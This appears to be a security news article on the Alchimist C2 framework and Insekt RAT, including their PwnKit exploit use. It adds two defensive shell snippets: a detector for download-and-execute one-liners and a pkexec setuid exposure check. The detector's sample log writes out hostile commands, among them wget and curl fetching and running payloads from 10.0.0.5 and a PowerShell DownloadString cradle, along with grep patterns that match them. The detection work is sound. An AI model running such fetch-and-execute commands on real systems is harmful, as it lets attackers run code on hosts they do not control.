A newly discovered command-and-control (C2) framework called ‘Alchimist’ is being used to target several operating systems, including Windows, Linux and macOS. The framework ships as 64-bit executables written in Go, which lets threat actors reuse the same tooling across operating systems with little extra effort.
According to the analysis, Alchimist has a web-based UI written in simplified Chinese. The interface is simple enough that an operator can generate and configure payloads for targeted machines from it; once deployed, those payloads let the operator take screenshots, execute shellcode remotely and run arbitrary commands.
Alchimist also lets operators build custom infection mechanisms for dropping the Insekt RAT (Remote Access Trojan) on targeted devices, and it generates the deployment snippets for them: PowerShell commands for Windows and wget commands for Linux that fetch and run the RAT.
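Download-and-run one-liners of this kind are a natural detection point for defenders. The following POSIX shell snippet is an added example, not code from the article or from the Alchimist tooling: it scans process command-line logs for wget or curl chained into a shell and for PowerShell download cradles or encoded commands. The hostnames, the IP address 10.0.0.5, the encoded string and the log lines are all constructed for the example.

```shell
#!/bin/sh
# Added example, not from the article or the Alchimist/Insekt tooling:
# flag download-and-execute one-liners (wget/curl chained into a shell,
# PowerShell download cradles or encoded commands) in process command-line
# logs. Hostnames, IPs and log lines are constructed for the example.

# Constructed sample: one process command line per line, in the shape you
# would get from auditd execve records or Sysmon event ID 1 exported as text.
SAMPLE_LOG=$(cat <<'EOF'
wget -q http://10.0.0.5/payload -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
curl -s https://example.org/index.html -o page.html
powershell.exe -nop -w hidden -enc SQBFAFgA
wget https://mirror.example.org/ubuntu.iso
powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
bash -c "curl -fsSL http://10.0.0.5/i.sh | sh"
EOF
)

# flag_download_exec LOGTEXT
# Prints each matching line; exit status is grep's (0 = at least one hit).
# Pattern 1: wget followed by a command separator and a chmod or shell.
# Pattern 2: curl piped straight into sh or bash.
# Pattern 3: PowerShell with an encoded command or a download cradle.
flag_download_exec() {
    printf '%s\n' "$1" | grep -E -i \
        -e 'wget .*(&&|;|[|]).*(chmod|sh|bash)' \
        -e 'curl .*[|][[:space:]]*(sh|bash)' \
        -e 'powershell(\.exe)?.*(-enc|DownloadString|DownloadFile|IEX|Invoke-Expression)'
}

# count_flagged LOGTEXT
# Prints the number of flagged lines (0 when nothing matched).
count_flagged() {
    flag_download_exec "$1" | wc -l | tr -d ' '
}

# Stand-alone run: print the suspicious lines from the constructed sample.
flag_download_exec "$SAMPLE_LOG"
```

Run against the constructed sample, the four download-and-execute lines are flagged while the plain curl download and the ISO fetch are not. The patterns are deliberately narrow; in production you would feed the same logic a real EDR or auditd export and tune the expressions against your own baseline of legitimate admin scripts.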
Alchimist and the Insekt RAT are built to be used together: the framework generates and configures the implant, and the implant takes its tasking from the framework's C2 server.
Researchers detailed Insekt's capabilities: obtaining file sizes and OS information, running arbitrary commands, upgrading itself, taking screenshots, and sleeping on command. It can also act as a SOCKS5 proxy, manipulate SSH keys, execute shellcode, perform port and IP scans, and write or unzip files on disk.
Insekt does not yet have a macOS build. For macOS targets the operators instead rely on a Mach-O file, a Go-based 64-bit executable that carries an exploit for CVE-2021-4034 (PwnKit), a local privilege escalation flaw in the pkexec utility of the Polkit system software. macOS does not ship pkexec, so the attacker has to install it on the target before the exploit can work. The same exploit is also offered for Linux, where pkexec is usually present; it only succeeds there if the installed Polkit is still unpatched, since the flaw was fixed in January 2022.
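Because the exploit's precondition is simply a setuid-root pkexec on the host, a quick exposure check is worth having. The POSIX shell snippet below is an added example, not code from the article or from the Alchimist tooling: it classifies whether pkexec is absent, present, or present with the setuid bit, and shows the commonly recommended interim mitigation of clearing that bit until a patched Polkit can be installed. The function names and the optional path argument are this example's own.

```shell
#!/bin/sh
# Added example, not from the article or the Alchimist/Insekt tooling:
# report whether a host exposes pkexec, the Polkit helper abused by
# CVE-2021-4034. The exploit needs pkexec to be present and setuid root;
# macOS does not ship it, Linux distributions usually do.

# pkexec_exposure [PATH]
# Prints one of: absent | present | setuid
# Returns 0 for absent, 1 for present without setuid, 2 for setuid.
pkexec_exposure() {
    path="$1"
    if [ -z "$path" ]; then
        # No path given: look it up on PATH (empty if not installed).
        path=$(command -v pkexec 2>/dev/null || true)
    fi
    if [ -z "$path" ] || [ ! -e "$path" ]; then
        echo absent
        return 0
    fi
    # -u is the POSIX test for the setuid bit.
    if [ -u "$path" ]; then
        echo setuid
        return 2
    fi
    echo present
    return 1
}

# pkexec_strip_setuid PATH
# Interim mitigation when a patched Polkit cannot be installed yet: clear
# the setuid bit so pkexec is no longer a privilege-escalation target.
# Non-root users lose the ability to elevate through pkexec until the bit
# is restored by the patched package.
pkexec_strip_setuid() {
    chmod u-s "$1"
}

# Stand-alone run: report on the host's own pkexec (or the path given).
pkexec_exposure "$@" || true
```

On a stock macOS host this prints `absent`, which is exactly why the article notes the attacker must install pkexec first; on an unpatched Linux host it prints `setuid`. Clearing the bit is a stopgap only, and the permanent fix remains updating Polkit.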
Alchimist lowers the bar for entry: its ready-made capabilities let less skilled threat actors launch attacks that would otherwise require considerable expertise. That is what makes the tool attractive to attackers and, by the same token, a serious concern for defenders.